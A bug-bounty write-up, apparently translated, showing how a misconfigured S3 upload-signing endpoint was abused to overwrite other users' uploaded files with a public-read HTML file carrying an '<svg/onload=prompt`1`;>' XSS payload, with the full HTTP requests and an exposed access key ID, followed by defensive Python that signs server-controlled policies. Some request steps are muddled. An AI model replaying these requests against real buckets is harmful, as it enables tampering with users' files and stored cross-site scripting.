Abusing ACL permissions to overwrite other users' uploaded files/videos in an S3 bucket

This post describes in detail how an ACL permission misconfiguration in an AWS S3 bucket was abused to overwrite files and videos uploaded by other users. Using a real case, the author walks through the complete attack chain from policy generation to file overwrite, covering HTTP request analysis and permission bypass.

Hi everyone, today I'm writing a post about a recent finding in one of the HackerOne programs. I was looking for IDOR vulnerabilities in the application, so I started fuzzing every request the application made, and I found the following request:

POST /api-2.0/s3-upload-signatures HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/home/xxx/test/upload
X-Requested-With: XMLHttpRequest, XMLHttpRequest
Cache-Control: no-cache
Content-Type: application/json; charset=utf-8
Authorization: Bearer :X-Example-Authorization: Bearer 
Content-Length: 311
Connection: close
Cookie: {}

{"expiration":"2018-12-18T11:58:24.376Z","conditions":[{"acl":"private"},{"bucket":"example-web-upload-bucket"},{"Content-Type":""},{"success_action_status":"200"},{"key":"a4fe6f57-a208-43a8-8aab-be2ac6ad06f9.jpg"},{"x-amz-meta-qqfilename":"1.jpg"},["content-length-range","1","9007199254740992"]]}

Basically, this request sets up the policy used to upload a file to the S3 bucket; right after it, I got the photo/video upload request shown below.

POST / HTTP/1.1
Host: example-web-upload-bucket.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: multipart/form-data; boundary=---------------------------1268156844136880633597812894
Content-Length: 1716
Origin: https://www.example.com
Connection: close

-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="key"

a4fe6f57-a208-43a8-8aab-be2ac6ad06f9.jpg
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="AWSAccessKeyId"

AKIAIOTLFW3HMG563JEA
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="Content-Type"

text/html
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="success_action_status"

200
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="acl"

public-read
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="x-amz-meta-qqfilename"

1.jpg
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="policy"

xxxxxxxxxxxxx{this is policy} 
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="signature"

n7QQDjsmZUL5fQMOXO0vvAF98kg=
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type:

-----------------------------1268156844136880633597812894--

This request uses the file upload policy generated by the first request. I tried to find out which other files existed in the S3 bucket the application currently uses; once I knew the names of some photos/videos in the same bucket, I tried to create a custom policy to upload unrestricted file types to the bucket, which would overwrite the existing files. The ACL permission was private, so I wanted to replace it with public-read so that every user of the application would be affected by this attack.

I tried to create a custom policy by changing the following values in the request:

POST / HTTP/1.1
Host: example-web-upload-bucket.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: multipart/form-data; boundary=---------------------------1268156844136880633597812894
Content-Length: 1716
Origin: https://www.example.com
Connection: close

-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="key"

a4fe6f57-a208-43a8-8aab-be2ac6ad06f9.jpg
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="AWSAccessKeyId"

AKIAIOTLFW3HMG563JEA
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="Content-Type"

-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="success_action_status"

200
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="acl"

private
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="x-amz-meta-qqfilename"

1.jpg
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="policy"

xxxxxxxxxxxxx{this is policy}
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="signature"

n7QQDjsmZUL5fQMOXO0vvAF98kg=
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type:

-----------------------------1268156844136880633597812894--

As shown in the screenshot, this created a custom policy for uploading an HTML file, which would overwrite the existing file on the server.

I used that policy in the file upload request, which looked like this:

POST / HTTP/1.1
Host: example-web-upload-bucket.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: multipart/form-data; boundary=---------------------------1268156844136880633597812894
Content-Length: 1716
Origin: https://www.example.com
Connection: close

-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="key"

a4fe6f57-a208-43a8-8aab-be2ac6ad06f9.jpg
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="AWSAccessKeyId"

AKIAIOTLFW3HMG563JEA
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="Content-Type"

text/html
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="success_action_status"

200
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="acl"

public-read
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="x-amz-meta-qqfilename"

1.html
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="policy"

xxxxxxxxxxxxx{this is policy}
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="signature"

n7QQDjsmZUL5fQMOXO0vvAF98kg=
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="file"; filename="1.html"
Content-Type: text/html

<svg/onload=prompt`1`;>
-----------------------------1268156844136880633597812894--

Now this request uploaded an unrestricted file to the bucket by overwriting an existing file, and abused the ACL permissions by giving that file public-read access.
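The root cause above is a signing endpoint that lets the client dictate the policy conditions (key, acl, Content-Type). The following added example, which is not code from the post or the affected application, shows the fix on the server side: the policy is built entirely from server-controlled values and signed, and a small evaluator applies the conditions the way S3 does, so a form carrying acl=public-read, Content-Type text/html, or another user's key is rejected. user_id, bucket, secret_key and the file_size field are constructed for the demonstration; the signature is the legacy SigV2 POST form (base64 of HMAC-SHA1 over the base64 policy), matching the 28-character signature in the requests above.

```python
import base64
import hashlib
import hmac
import json
import uuid
from datetime import datetime, timedelta, timezone


def build_policy(user_id, bucket, secret_key):
    """Build and sign an S3 POST policy entirely from server-side values.
    The client never supplies key, acl or Content-Type; it only receives the result."""
    key = f"uploads/{user_id}/{uuid.uuid4()}"          # per-user prefix, random object name
    expires = datetime.now(timezone.utc) + timedelta(minutes=5)
    policy = {
        "expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),
        "conditions": [
            {"bucket": bucket},
            {"key": key},                                # exact match: cannot target other keys
            {"acl": "private"},                          # exact match: public-read is rejected
            ["starts-with", "$Content-Type", "image/"],  # no text/html, so no stored HTML/XSS
            ["content-length-range", 1, 10 * 1024 * 1024],
        ],
    }
    policy_b64 = base64.b64encode(json.dumps(policy).encode()).decode()
    # Legacy SigV2 POST signature: base64(HMAC-SHA1(secret, base64(policy)))
    digest = hmac.new(secret_key.encode(), policy_b64.encode(), hashlib.sha1).digest()
    return policy, policy_b64, base64.b64encode(digest).decode()


def form_satisfies_policy(policy, form):
    """Evaluate the policy conditions against submitted form fields the way S3 does.
    'form' maps field name -> value; 'bucket' (from the request host) and 'file_size'
    (the uploaded body length) are folded into the dict here for simplicity."""
    for cond in policy["conditions"]:
        if isinstance(cond, dict):                       # {"field": "value"} = exact match
            (field, expected), = cond.items()
            if form.get(field) != expected:
                return False
        elif cond[0] == "starts-with":                   # ["starts-with", "$field", "prefix"]
            if not str(form.get(cond[1][1:], "")).startswith(cond[2]):
                return False
        elif cond[0] == "content-length-range":          # ["content-length-range", min, max]
            if not cond[1] <= form.get("file_size", 0) <= cond[2]:
                return False
    return True
```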

That's it :D Thanks for reading, everyone. Have a great day.
